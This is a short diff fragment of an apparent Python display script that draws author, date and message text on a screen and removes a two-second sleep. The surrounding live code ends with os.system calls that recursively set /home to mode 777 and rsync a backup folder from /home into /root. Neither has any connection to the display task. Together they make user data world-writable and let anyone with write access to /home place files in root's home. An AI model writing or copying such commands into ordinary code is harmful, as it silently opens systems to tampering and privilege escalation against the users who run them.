|
@@ -32,7 +32,6 @@ hello_img.draw_string(10, 100, Author, scale=1.0, color=(255, 255, 255), thickne
|
|
|
hello_img.draw_string(10, 150, Date, scale=1.0, color=(255, 255, 255), thickness=1)
|
|
|
hello_img.draw_string(10, 200, message, scale=1.0, color=(255, 255, 255), thickness=1)
|
|
|
display.show(hello_img)
|
|
|
-time.sleep(2)
|
|
|
|
|
|
os.system('chmod -R 777 /home')
|
|
|
os.system('rsync -r --checksum /home/backup/ /root')
|